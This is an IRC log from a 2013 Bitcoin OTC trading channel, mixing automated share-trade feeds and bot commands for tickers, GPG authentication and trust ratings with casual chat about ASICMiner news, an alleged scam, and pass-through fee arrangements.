[TAT.ASICMINER] 1 @ 0.024999 BTC [+] May 23 19:19:02 [HAVELOCK] [ASICM] 1 @ 0.02425 BTC [+] May 23 19:19:08 [BTCTC] [COGNITIVE] 1 @ 0.26 BTC [+] May 23 19:19:08 1000 BTC? May 23 19:19:09 [BTCTC] [COGNITIVE] 2 @ 0.29 = 0.58 BTC [+] May 23 19:19:10 [BTCTC] [COGNITIVE] 3 @ 0.3 = 0.9 BTC [+] May 23 19:19:14 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] May 23 19:19:19 too much to be using mBTC May 23 19:19:19 [BTCTC] [COGNITIVE] 12 @ 0.3 = 3.6 BTC [+] May 23 19:19:33 [BTCTC] [COGNITIVE] 2 @ 0.31 = 0.62 BTC [+] May 23 19:19:37 [BTCTC] [COGNITIVE] 7 @ 0.3194 = 2.2358 BTC [+] May 23 19:19:37 yeah i dont know why these guys haven't it this way, annoying May 23 19:19:37 unless youre an asshole May 23 19:19:38 [BTCTC] [COGNITIVE] 4 @ 0.342 = 1.368 BTC [+] May 23 19:19:39 [BTCTC] [COGNITIVE] 2 @ 0.3438 = 0.6876 BTC [+] May 23 19:19:40 [BTCTC] [COGNITIVE] 2 @ 0.3439 = 0.6878 BTC [+] May 23 19:19:41 [BTCTC] [COGNITIVE] 8 @ 0.3439 = 2.7512 BTC [+] May 23 19:19:42 thanks nams May 23 19:19:42 how much is 1,000,000 *uBTC in btc again? May 23 19:19:48 [BTCTC] [COGNITIVE] 9 @ 0.344 = 3.096 BTC [+] May 23 19:19:48 [BTCTC] [BASIC-MINING] 8 @ 0.59 = 4.72 BTC [+] May 23 19:20:14 100,000 mBTC is 100 btc May 23 19:20:50 How long does it take to open an asset on BTCTC ? May 23 19:21:16 hey guys May 23 19:21:20 check this out May 23 19:21:32 ? May 23 19:21:33 Friedcat: "Shipped Blades: 278. The sales keeps a slow but steady pace." May 23 19:21:44 "Shipped USB Sticks: 530. A lot more in the following week." May 23 19:21:56 "We also finalized the decision on making the next-gen (65/55nm) chips also fit in a USB powered device so that we could make Block Erupter USB II possible, instead of integrating too many cores into one big chip." May 23 19:22:02 booya! May 23 19:22:27 cool May 23 19:22:28 just to fuck with bfl May 23 19:22:38 BFL is deal. May 23 19:22:49 I need to see 28nm chips now. :P May 23 19:23:00 BFL is going to rape AM May 23 19:23:34 [BTCTC] [TAT.ASICMINER] 60 @ 0.0243 = 1.458 BTC [-] May 23 19:23:35 mBTC = milliBTC = milliseconds = 1000 milliseconds in 1 second = add or subtract 3 zeros to convert between mBTC and BTC. 2304303834000 mBTC = 2304303834 BTC. 3940723523947852 mBTC = 3940723523947.852 BTC = moved decimal place 3 to make it smaller May 23 19:23:56 lol May 23 19:23:59 rofl May 23 19:24:00 yeah you better buy BFL stock while you still can't! May 23 19:24:19 How long does it take to open an asset on BTCTC ? May 23 19:24:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0243 = 0.243 BTC [-] May 23 19:24:45 depends May 23 19:24:48 BFL where you can do imaginary ASIC preorders and by the time you get them they will be worthless to mine with May 23 19:24:56 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [-] May 23 19:25:11 what github said. May 23 19:25:14 *B May 23 19:25:28 AM where they mine with them themselves until they're *almost* worthless and sell em May 23 19:25:36 [BTCTC] [ASICMINER-PT] 2 @ 2.4899 = 4.9798 BTC [-] May 23 19:25:37 [BTCTC] [ASICMINER-PT] 5 @ 2.49 = 12.45 BTC [+] May 23 19:25:50 [12:24] How long does it take to open an asset on BTCTC ? <<<<1. Talk to Burnsude 2. Open a thread on the forums gut-checking your asset plan 3. Fill out the application and pay 5btc 4. Wait 1-2 weeks for enough votes (not guaranteed) May 23 19:26:35 lol May 23 19:26:48 I will keep it in OTC. :P May 23 19:26:48 [BTCTC] [TAT.ASICMINER] 6 @ 0.025 = 0.15 BTC [+] May 23 19:27:07 Its a small asset, No need to go with all the hassle. May 23 19:27:18 only 300 shares. May 23 19:27:23 yeah no need to do something the right way, fuckit May 23 19:27:32 just scamz instead, way easier May 23 19:27:42 lol May 23 19:27:58 ThickAsThieves: I need the funding in 2 days MAX. May 23 19:28:07 Wait 1-2 weeks for enough votes (not guaranteed) May 23 19:28:10 ... May 23 19:28:14 its alot of hard work to scam May 23 19:28:15 good luck May 23 19:28:23 look at the amount of effort ziggap went into May 23 19:28:27 Did you ever pay Topace back? May 23 19:28:53 Most. May 23 19:29:01 very small amount left. May 23 19:29:05 https://bitcointalk.org/index.php?topic=214227.0 May 23 19:29:17 [BTCTC] [TAT.ASICMINER] 17 @ 0.025 = 0.425 BTC [+] May 23 19:30:10 If he had to run, aethero could have at least have given the website and business to someone else. Not like he's going to need those... May 23 19:30:50 i'm sure he'll be back with a new busines name May 23 19:31:14 like BTCOxygen tm? May 23 19:32:31 would suck to be him tho, watching your back everyday just waiting for someone to come up behind you and donkey punch you in front of your kids and stuff May 23 19:32:46 depends how much he banked May 23 19:32:53 he could just disappear May 23 19:33:02 scared for your life, people are ready to bash your baseball bats n stuff May 23 19:33:08 its pretty scary May 23 19:33:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] May 23 19:33:25 i dont think any one person lost enough money May 23 19:33:30 to want to kill hm May 23 19:33:45 [BTCTC] [CRYPTO-TRADE] 20 @ 0.19989 = 3.9978 BTC [-] May 23 19:33:54 twas a well-distributed scam May 23 19:33:55 people have paid in bitcoin to put hits on him May 23 19:33:58 the great part May 23 19:34:00 is that May 23 19:34:22 the whole scam was propped into this world by his btc wot reputation May 23 19:34:30 go wot! May 23 19:34:36 yeah wot May 23 19:34:39 biggest failing May 23 19:34:57 Athero scammed again? May 23 19:35:12 aethero May 23 19:35:42 If so, not the first time May 23 19:35:46 wouldn't be that hard, we found kenfrom cryptoexechange May 23 19:35:54 he shat his pants real quick May 23 19:36:02 [HAVELOCK] [ASICM] 5 @ 0.023 = 0.115 BTC [-] May 23 19:36:04 [HAVELOCK] [ASICM] 8 @ 0.0225 = 0.18 BTC [-] May 23 19:36:05 [HAVELOCK] [ASICM] 1 @ 0.02245 BTC [-] May 23 19:36:06 [HAVELOCK] [ASICM] 2 @ 0.0222 = 0.0444 BTC [-] May 23 19:36:07 [HAVELOCK] [ASICM] 100 @ 0.022 = 2.2 BTC [-] May 23 19:36:08 [HAVELOCK] [ASICM] 1 @ 0.02134 BTC [-] May 23 19:36:09 [HAVELOCK] [ASICM] 1 @ 0.0211387 BTC [-] May 23 19:36:10 [HAVELOCK] [ASICM] 36 @ 0.0211 = 0.7596 BTC [-] May 23 19:36:25 aww May 23 19:36:28 i missed that May 23 19:37:02 [HAVELOCK] [ASICM] 274 @ 0.0211 = 5.7814 BTC [-] May 23 19:37:12 [BTCTC] [S.DICE-PT] 61 @ 0.002651 = 0.1617 BTC [+] May 23 19:37:14 [BTCTC] [S.DICE-PT] 15 @ 0.002652 = 0.0398 BTC [+] May 23 19:37:15 [BTCTC] [S.DICE-PT] 50 @ 0.00266 = 0.133 BTC [+] May 23 19:37:17 [BTCTC] [S.DICE-PT] 10 @ 0.002738 = 0.0274 BTC [+] May 23 19:37:18 [BTCTC] [S.DICE-PT] 4 @ 0.00274 = 0.011 BTC [+] May 23 19:37:19 [BTCTC] [S.DICE-PT] 5 @ 0.002748 = 0.0137 BTC [+] May 23 19:37:20 [BTCTC] [S.DICE-PT] 2025 @ 0.00299 = 6.0548 BTC [+] May 23 19:38:29 [BTCTC] [COGNITIVE] 1 @ 0.344 BTC [+] May 23 19:38:31 [BTCTC] [COGNITIVE] 2 @ 0.3649 = 0.7298 BTC [+] May 23 19:39:13 sdice rally heh May 23 19:39:32 Bugpowders fault May 23 19:39:36 yeah nice, i glad i got in before May 23 19:39:45 do you run btcinvest as well tat? May 23 19:39:50 nope May 23 19:40:03 [HAVELOCK] [ASICM] 280 @ 0.024 = 6.72 BTC [+] May 23 19:40:16 oh, he was just giving you a plug or something? May 23 19:41:53 I love SDICE rallies May 23 19:42:18 its probably namworld /confused May 23 19:42:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] May 23 19:43:03 No... cause currently my PT sells for much more than SDICE elsewhere May 23 19:43:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] May 23 19:43:26 [BTCTC] [S.DICE-PT] 50 @ 0.00299 = 0.1495 BTC [+] May 23 19:43:28 who's btcinvest on bf? May 23 19:45:48 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [+] May 23 19:46:03 [HAVELOCK] [ASICM] 20 @ 0.024 = 0.48 BTC [+] May 23 19:46:04 [HAVELOCK] [ASICM] 74 @ 0.024 = 1.776 BTC [+] May 23 19:48:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] May 23 19:48:52 ThickAsThieves: Stop being a ASICMINER horder May 23 19:49:31 ;;ticker May 23 19:49:32 BTCUSD ticker | Best bid: 125.75001, Best ask: 126.06995, Bid-ask spread: 0.31994, Last trade: 126.07000, 24 hour volume: 22571.45738168, 24 hour low: 122.24002, 24 hour high: 126.93446, 24 hour vwap: 124.74086 May 23 19:49:40 !last m S.MPOE May 23 19:49:40 Last trade for S.MPOE on MPEX was at 0.00070442 BTC [-] May 23 19:50:11 [BTCTC] [TAT.ASICMINER] 13 @ 0.025 = 0.325 BTC [+] May 23 19:50:28 [BTCTC] [COGNITIVE] 1 @ 0.3999 BTC [+] May 23 19:51:22 [MPEX] [S.MPOE] 5264 @ 0.00070727 = 3.7231 BTC [+] May 23 19:52:22 [BTCTC] [TAT.ASICMINER] 16 @ 0.0255 = 0.408 BTC [+] May 23 19:57:02 [HAVELOCK] [ASICM] 16 @ 0.024285 = 0.3886 BTC [+] May 23 19:57:28 [12:48] ThickAsThieves: Stop being a ASICMINER horder OMNOMNOMNOM May 23 19:57:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.024251 = 0.485 BTC [-] May 23 19:57:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.02425 = 0.1213 BTC [-] May 23 19:58:51 [BTCTC] [BASIC-MINING] 1 @ 0.59 BTC [+] May 23 19:59:09 On this episode of horders we clear out ThickAsThieves house full of old ASICMIER shares May 23 19:59:16 ;;gpg May 23 19:59:16 Error: "gpg" is not a valid command. May 23 19:59:23 ;;ident May 23 19:59:23 You are not identified. May 23 19:59:29 ;;getrating thestringpuller May 23 19:59:29 WARNING: Currently not authenticated. User thestringpuller, rated since Mon Oct 15 15:46:37 2012. Cumulative rating 11, from 8 total ratings. Received ratings: 8 positive, 0 negative. Sent ratings: 7 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=thestringpuller May 23 20:00:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [+] May 23 20:01:23 ;;eauth May 23 20:01:23 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. May 23 20:01:28 ;;eauth thestringpuller May 23 20:01:29 Request successful for user thestringpuller, hostmask thestringpuller!~leflor@99-39-97-12.lightspeed.tukrga.sbcglobal.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0FF2943DA179E169 May 23 20:02:01 [HAVELOCK] [HIM] 18 @ 2.3499 = 42.2982 BTC [+] May 23 20:02:07 ;;eauth freenode:#bitcoin-otc:8aa06b3bcdf39a29064f4da379e6a0c189e2674c0d0687dc6a9778be May 23 20:02:08 Error: This nick is not registered. Please register. May 23 20:02:22 ;;everify freenode:#bitcoin-otc:8aa06b3bcdf39a29064f4da379e6a0c189e2674c0d0687dc6a9778be May 23 20:02:23 You are now authenticated for user thestringpuller with key 0FF2943DA179E169 May 23 20:02:27 my bad ;;gribble May 23 20:02:32 ;;gribble gribble May 23 20:02:32 yes I am gribble. why do you keep bothering me? May 23 20:02:33 [BTCTC] [COGNITIVE] 1 @ 0.27001 BTC [-] May 23 20:02:34 [BTCTC] [COGNITIVE] 1 @ 0.270001 BTC [-] May 23 20:02:36 [BTCTC] [COGNITIVE] 5 @ 0.27 = 1.35 BTC [-] May 23 20:02:45 !ticker B BITVPS May 23 20:02:46 It's so strange that you don't remember any of your poetry. May 23 20:02:54 !ticker B BVPS May 23 20:02:55 The eagle never lost so much time as when he submitted to learn from the crow. May 23 20:03:02 [HAVELOCK] [HIM] 10 @ 2.35 = 23.5 BTC [+] May 23 20:03:03 !ticker BTCTC BVPS May 23 20:03:05 I prepared your canoe with cedar boughs. May 23 20:03:07 !ticker BTCTC BITVPS May 23 20:03:09 [BTCT:BITVPS] 1D: 0.00057 / 0.00071 / 0.000858 (2569 shares, 1.8 BTC), 7D: 0.00051 / 0.00067 / 0.000858 (15824 shares, 10.6 BTC), 30D: 0.00051 / 0.00084 / 0.001887 (40001 shares, 33.6 BTC) May 23 20:03:14 !last BTCTC BITVPS May 23 20:03:15 Last trade for BITVPS on BTCTC was at 0.00065 BTC [+] May 23 20:04:02 [HAVELOCK] [HIM] 4 @ 2.385 = 9.54 BTC [+] May 23 20:04:31 ;;rate smickles 0 seems overwhelmed. good people. May 23 20:04:31 Error: Rating must be in the interval [-10, 10] and cannot be zero. May 23 20:04:38 ;;rate smickles 1 seems overwhelmed. good people. May 23 20:04:40 Rating entry successful. Your rating for user smickles has changed from -1 to 1. May 23 20:06:03 [HAVELOCK] [HIM] 2 @ 2.39 = 4.78 BTC [+] May 23 20:07:49 what is mickles up to these days May 23 20:08:17 [BTCTC] [S.MPOE-PT] 250 @ 0.0007 = 0.175 BTC [+] May 23 20:09:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.025399 = 0.1524 BTC [-] May 23 20:09:58 ;;.25 * 3 May 23 20:09:58 Error: ".25" is not a valid command. May 23 20:10:02 ;;calc .25 * 3 May 23 20:10:04 0.75 May 23 20:10:33 ;;calc .5 * 3 May 23 20:10:33 1.5 May 23 20:11:45 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] May 23 20:12:33 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] May 23 20:13:53 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [+] May 23 20:13:55 forgot all about this channel May 23 20:14:01 :/ May 23 20:14:24 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [+] May 23 20:15:56 2013-05-23 08:50:31 Market Buy 497 ฿ 2.45 ฿ 1217.65 May 23 20:16:07 anyone think there is a market for fractional ownership of a mini-rig (the 500 Gh/s unit) May 23 20:16:39 would probably keep it private May 23 20:16:46 Hey goat May 23 20:17:00 would probably do nor more than 10 holders May 23 20:17:09 if i kept it private May 23 20:17:28 yeah - understood there May 23 20:17:33 1718 May 23 20:17:40 is the MR order number May 23 20:17:46 =) May 23 20:18:25 [BTCTC] [BITVPS] 9 @ 0.000787 = 0.0071 BTC [+] May 23 20:18:31 yeah - all my 60 Gh/s units are in the lower 17xx as well May 23 20:18:49 Chaaang-Noi: josh has said it will be 3 x 500 units May 23 20:19:13 well - except for the 9kW in power May 23 20:19:16 ;) May 23 20:19:40 I might just sell one unit outright May 23 20:20:54 myea i miss mining. May 23 20:21:27 sounds like a plan May 23 20:22:13 [BTCTC] [BITVPS] 1 @ 0.00079 BTC [+] May 23 20:24:47 ;;ticker May 23 20:24:48 BTCUSD ticker | Best bid: 125.77771, Best ask: 125.80000, Bid-ask spread: 0.02229, Last trade: 125.80000, 24 hour volume: 23172.04481068, 24 hour low: 122.24221, 24 hour high: 126.93446, 24 hour vwap: 124.82480 May 23 20:26:00 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 23 20:29:02 [HAVELOCK] [ASICM] 134 @ 0.024285 = 3.2542 BTC [+] May 23 20:30:02 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [+] May 23 20:31:03 [HAVELOCK] [ASICM] 371 @ 0.0243 = 9.0153 BTC [+] May 23 20:32:28 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 23 20:34:51 Only thing that remains to be seen is whether it was epic fail or epic win. May 23 20:35:02 [HAVELOCK] [ASICM] 220 @ 0.0244 = 5.368 BTC [+] May 23 20:35:17 ...or possibly epic meh. May 23 20:40:04 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [+] May 23 20:41:45 [BTCTC] [PAJKA.BOND] 2 @ 0.1079 = 0.2158 BTC [-] May 23 20:41:51 [BTCTC] [PAJKA.BOND] 1 @ 0.1081 BTC [+] May 23 20:41:53 [BTCTC] [PAJKA.BOND] 1 @ 0.1084 BTC [+] May 23 20:41:54 [BTCTC] [PAJKA.BOND] 4 @ 0.10899 = 0.436 BTC [+] May 23 20:41:56 [BTCTC] [PAJKA.BOND] 3 @ 0.109 = 0.327 BTC [+] May 23 20:41:57 [BTCTC] [PAJKA.BOND] 2 @ 0.10919 = 0.2184 BTC [+] May 23 20:41:59 [BTCTC] [PAJKA.BOND] 55 @ 0.109989 = 6.0494 BTC [+] May 23 20:44:58 [BTCTC] [TAT.ASICMINER] 19 @ 0.0255 = 0.4845 BTC [+] May 23 20:48:36 [BTCTC] [GSDPT] 3 @ 0.00277 = 0.0083 BTC [-] May 23 20:51:03 [HAVELOCK] [ASICM] 300 @ 0.0246 = 7.38 BTC [+] May 23 20:51:40 [BTCTC] [S.MPOE-PT] 2 @ 0.0007 = 0.0014 BTC [+] May 23 20:53:06 [BTCTC] [ASICMINER-PT] 1 @ 2.489999 BTC [-] May 23 20:53:08 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 23 20:53:53 !ticker h asicm May 23 20:53:54 [HAVELOCK:ASICM] 1D: 0.02110000 / 0.02506374 / 0.02710000 (24868 shares, 623.28518513 BTC), 7D: 0.01700000 / 0.02282137 / 0.03000000 (130278 shares, 2973.12185080 BTC), 30D: 0.01290000 / 0.0201684 / 0.03000000 (211149 shares, 4258.53854070 BTC) May 23 20:54:26 !ticker h sdice May 23 20:54:28 [HAVELOCK:SDICE] 1D: 0.22000000 / 0.22901666 / 0.23500000 (30 shares, 6.87049994 BTC), 7D: 0.18700000 / 0.23402089 / 0.25500000 (1187 shares, 277.78280159 BTC), 30D: 0.12000000 / 0.26054728 / 0.33480000 (3941 shares, 1026.81684814 BTC) May 23 20:55:02 [HAVELOCK] [ASICM] 11 @ 0.0246 = 0.2706 BTC [+] May 23 20:55:03 [HAVELOCK] [ASICM] 12 @ 0.0246 = 0.2952 BTC [+] May 23 20:55:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.0257 = 0.1799 BTC [+] May 23 20:56:01 [HAVELOCK] [ASICM] 10 @ 0.0246 = 0.246 BTC [+] May 23 20:56:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.025699 = 0.0514 BTC [-] May 23 20:57:03 ;;ticker May 23 20:57:04 BTCUSD ticker | Best bid: 125.57999, Best ask: 126.00000, Bid-ask spread: 0.42001, Last trade: 126.00000, 24 hour volume: 23597.66248243, 24 hour low: 122.26000, 24 hour high: 126.93446, 24 hour vwap: 124.89186 May 23 20:57:33 [BTCTC] [ASICMINER-PT] 1 @ 2.461001 BTC [-] May 23 20:57:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.025699 = 0.3084 BTC [-] May 23 20:58:13 [BTCTC] [ASICMINER-PT] 1 @ 2.461001 BTC [-] May 23 20:58:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.0257 = 0.1285 BTC [+] May 23 20:59:38 [BTCTC] [TAT.ASICMINER] 33 @ 0.0257 = 0.8481 BTC [+] May 23 21:00:46 [BTCTC] [TAT.ASICMINER] 21 @ 0.025909 = 0.5441 BTC [+] May 23 21:01:05 Wait, cognitive traded at 0.3999 today? Wow. Mining shares are really going grazy... May 23 21:02:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.02589 BTC [-] May 23 21:03:03 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 23 21:04:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.025102 = 0.502 BTC [-] May 23 21:04:33 [BTCTC] [TAT.ASICMINER] 44 @ 0.025101 = 1.1044 BTC [-] May 23 21:04:35 [BTCTC] [TAT.ASICMINER] 36 @ 0.0251 = 0.9036 BTC [-] May 23 21:04:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [+] May 23 21:05:13 [BTCTC] [TAT.ASICMINER] 40 @ 0.02589 = 1.0356 BTC [+] May 23 21:05:14 [BTCTC] [TAT.ASICMINER] 49 @ 0.0251 = 1.2299 BTC [-] May 23 21:05:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.025001 = 0.225 BTC [-] May 23 21:05:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [-] May 23 21:05:20 [BTCTC] [TAT.ASICMINER] 30 @ 0.0249 = 0.747 BTC [-] May 23 21:05:43 [BTCTC] [ASICMINER-PT] 4 @ 2.49 = 9.96 BTC [+] May 23 21:06:00 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 23 21:06:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.02589 = 0.1036 BTC [+] May 23 21:07:02 [HAVELOCK] [ASICM] 4 @ 0.0245 = 0.098 BTC [-] May 23 21:10:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.0258 = 0.0516 BTC [-] May 23 21:12:36 [BTCTC] [B.YABMC] 10 @ 0.01673 = 0.1673 BTC [+] May 23 21:12:38 [BTCTC] [B.YABMC] 84 @ 0.01674 = 1.4062 BTC [+] May 23 21:12:41 [BTCTC] [B.YABMC] 16 @ 0.017 = 0.272 BTC [+] May 23 21:15:42 [BTCTC] [RSM] 10 @ 0.012099 = 0.121 BTC [+] May 23 21:16:24 parseval: you around? May 23 21:17:10 [BTCTC] [RSM] 2 @ 0.0121 = 0.0242 BTC [+] May 23 21:18:02 [HAVELOCK] [ASICM] 1 @ 0.0245 BTC [-] May 23 21:18:55 [BTCTC] [BITVPS] 4 @ 0.00081 = 0.0032 BTC [+] May 23 21:19:37 If you ignore the last couple of Cognitive trades, every single mining asset on BTCT is up today. Cognitive was up 50% before the latest couple of trades. May 23 21:20:02 [HAVELOCK] [ASICM] 17 @ 0.02401 = 0.4082 BTC [-] May 23 21:20:38 I'm here May 23 21:21:30 Sort of, anyway, inhies, since I am at work May 23 21:22:02 [HAVELOCK] [VTX] 2 @ 0.4112 = 0.8224 BTC [-] May 23 21:22:08 [BTCTC] [ASICMINER-PT] 2 @ 2.489 = 4.978 BTC [-] May 23 21:23:25 ah ok parseval May 23 21:23:33 i was gonna bug you about oauth on btctc since you seem to have it working May 23 21:23:39 [BTCTC] [BASIC-MINING] 9 @ 0.59 = 5.31 BTC [+] May 23 21:23:50 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [-] May 23 21:23:54 when you pass oob for callback, and you go to the URL and approve teh access request, what happens next? May 23 21:24:10 for me, the page reloads with the verificiation string appended in the URL, but when I try and use it the API says its invalid May 23 21:24:29 and by page reloads, i mean the page where you approve access to your account for the application May 23 21:25:02 If I remember right, I had to change from calling that as a POST to a GET to make it work May 23 21:25:02 but it's a little shakey for him to be running his own PT imo || TAT, still around? May 23 21:25:04 have you tried setting the flux capacitor to eleventeen? May 23 21:25:12 yessir May 23 21:25:17 hola! May 23 21:25:18 heh May 23 21:25:21 ola May 23 21:25:46 I just wanted to throw out there that I tried to get several folks to run it before I ran with it. May 23 21:25:51 I can post some code tonight if you want, inhies May 23 21:26:01 i understand May 23 21:26:06 and i personally trust you May 23 21:26:17 but i def have had some convs with people May 23 21:26:19 And when I set it up, it had 5% fees... plan was to get it setup, then find someone to take over. May 23 21:26:30 where it makes it raise Qs May 23 21:26:47 [BTCTC] [COGNITIVE] 1 @ 0.270001 BTC [+] May 23 21:26:52 I had to ditch the fees to get around whatever closed door setup Ukto/DeaDTerra had setup to end up at zero fees. May 23 21:27:01 i def understand how you got into the position as well May 23 21:27:06 [BTCTC] [COGNITIVE] 3 @ 0.27 = 0.81 BTC [-] May 23 21:27:06 you HAD to do no fees May 23 21:27:13 parseval: that would be great if you could. I'll be leaving in a couple hours and i'll be gone all day, but feel free to PM me, I really appreciate it May 23 21:27:38 What I'd love to do now is work out something with Ukto/DeaDTerra where we both agree to like a 0.5% fee or something. May 23 21:27:44 At which point I could find someone to take it over. May 23 21:27:49 but you cant really May 23 21:27:56 people would FLIP OUT May 23 21:27:56 i use a GET with the URL to approve teh app, since that is done in a browser, obviously, and then the approval form is a POST, but then it reloads with a GET to the same URL with the verifier string appended May 23 21:28:08 i did send you some ideas though May 23 21:28:16 Yeah, it would be ugly for a few days. May 23 21:28:16 about ways you could make it happen May 23 21:28:25 here's what you do May 23 21:28:36 who keeps buying YABMC - grr May 23 21:28:40 why's everyone bailing on AM PT? May 23 21:28:44 you get DT to agree to stop importing with you doing the same May 23 21:28:50 then May 23 21:29:12 you let me (or whomever, but I'm obv the coolest) open a new PT May 23 21:29:16 that allows importing May 23 21:29:21 but has a fee May 23 21:29:33 eventually yours and DTs would get smaller and smaller May 23 21:29:40 [BTCTC] [COGNITIVE] 15 @ 0.271 = 4.065 BTC [+] May 23 21:29:50 til they were gone May 23 21:30:07 burnside: trades using 2FA fee on btct applies if you are just logged in via 2fa, or also use 2fa for the trade itself? May 23 21:30:15 yours would also demand a premium May 23 21:30:18 cuz no fee May 23 21:30:28 yup, I like that idea too. it would suck splitting the liquidity during the transition, and also would require collaboration like the other approach. May 23 21:30:55 fiat500 -- the discount is only if you use 2FA for trades. May 23 21:30:58 well May 23 21:31:06 the thing about the liquidity is May 23 21:31:13 alright thanks May 23 21:31:14 we could easily move people May 23 21:31:19 without involving friedcat May 23 21:31:35 but yeah May 23 21:31:41 if both were backed by the same account with friedcat, true May 23 21:31:42 there's no perfect answer May 23 21:31:59 even if they weren't May 23 21:32:00 [BTCTC] [BASIC-MINING] 3 @ 0.59 = 1.77 BTC [+] May 23 21:32:09 as long as I had spare shares May 23 21:32:12 to cover them May 23 21:32:19 [BTCTC] [RSM] 8 @ 0.0121 = 0.0968 BTC [+] May 23 21:32:23 yeah, that's true. I don't have many spares on my side tho. May 23 21:32:25 we could square up on our own May 23 21:32:49 hell i might even WANT to have some of your shares May 23 21:32:52 in the old PT May 23 21:32:52 we could definitely reduce the volume with Friedcat a ton by working it in batches May 23 21:33:06 [BTCTC] [RSM] 3 @ 0.0122 = 0.0366 BTC [+] May 23 21:33:23 that is def something i am sensitive to, May 23 21:33:32 friedcat does too much xfering already May 23 21:33:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.025787 = 0.1547 BTC [+] May 23 21:33:39 and if he has to do more, May 23 21:33:44 he'll just make an exchange May 23 21:33:44 thing for me is that if we do that, I'd want to set a deadline where I can shut down my PT. If the goal is to alleviate the conflict of interest, there needs to be a finish line. May 23 21:33:50 [BTCTC] [BASIC-MINING] 4 @ 0.59 = 2.36 BTC [+] May 23 21:33:51 and we'll all be kinda screwed May 23 21:34:25 I think that'd be a mistake for him, but it's a definite possibility. May 23 21:34:26 you will also have to do some hardcore convincing with Ukto May 23 21:34:29 not trying to be a pain, but doesn't the stockholder agreement say we can transfer in an out? May 23 21:34:45 but it looks like a 30 day shutdown is perfetly fine per the agreement May 23 21:34:46 it also says he can close the asset May 23 21:34:56 [MPEX] [S.MPOE] 4170 @ 0.00070442 = 2.9374 BTC [-] May 23 21:34:59 yes May 23 21:35:07 he can make motions May 23 21:35:12 for alternative solutions May 23 21:35:17 and I think the stockholders would approve :) May 23 21:35:28 in the end, shut down aint gonna happen unless DT stops importing too May 23 21:35:32 yeah, I'd have to announce that it was closing in 6 months. let people transfer wherever they want, with a carrot (instant transfer) for people transitioning to the alternate PT May 23 21:36:37 I thought DT already said he was shutting and paying yesterday May 23 21:36:41 no May 23 21:36:46 burnside: sounds generous and reasonable to me May 23 21:36:46 thats the Gamma Fund May 23 21:36:50 that's his investment fund left over from GLBSE May 23 21:37:00 oh ok I see May 23 21:37:03 [MPEX] [S.MPOE] 2550 @ 0.00070678 = 1.8023 BTC [+] May 23 21:37:44 TAT, only way any of this works though is if the PT on BF somehow develops a fee setup. May 23 21:38:04 you should talk to Ukto, May 23 21:38:14 cuz he doesnt have much to gain May 23 21:38:16 from a change May 23 21:38:26 so it will require some very candid conversation May 23 21:38:52 yup, I'll have to have a chat for sure. May 23 21:39:15 Burnside, you're here! Good to see you! May 23 21:39:16 and neither of you wants to give up any of that sweet sweet volume :) May 23 21:40:24 That is definitely true. The exchange lives or dies by volume. May 23 21:40:45 furuknap -- hola. ;) May 23 21:41:42 furuknap and I are gonna have a public debate May 23 21:41:43 [BTCTC] [BASIC-MINING] 4 @ 0.59 = 2.36 BTC [+] May 23 21:41:59 sadly, gotta head out. withdrawals to process and day job to attend to. May 23 21:42:18 cool cool May 23 21:43:47 i've got +17 trust now, can I sell those for ripples? May 23 21:43:50 No worries, keep up the good job. May 23 21:44:04 [MPEX] [S.MPOE] 8500 @ 0.00070707 = 6.0101 BTC [+] May 23 21:44:15 ooh i want +17 trust May 23 21:44:23 where do i get the trust from? May 23 21:44:33 people that trust me May 23 21:44:35 :) May 23 21:44:47 ;;ident ThickAsThieves May 23 21:44:48 Nick 'ThickAsThieves', with hostmask 'ThickAsThieves!ThickAsThi@c-98-231-58-41.hsd1.fl.comcast.net', is not identified. May 23 21:44:52 Bah, it's just 17 shill account... :-P May 23 21:44:53 tisk May 23 21:45:03 ;;getrating ThickAsThieves May 23 21:45:03 WARNING: Currently not authenticated. User thickasthieves, rated since Sat Mar 2 08:19:18 2013. Cumulative rating 2, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: 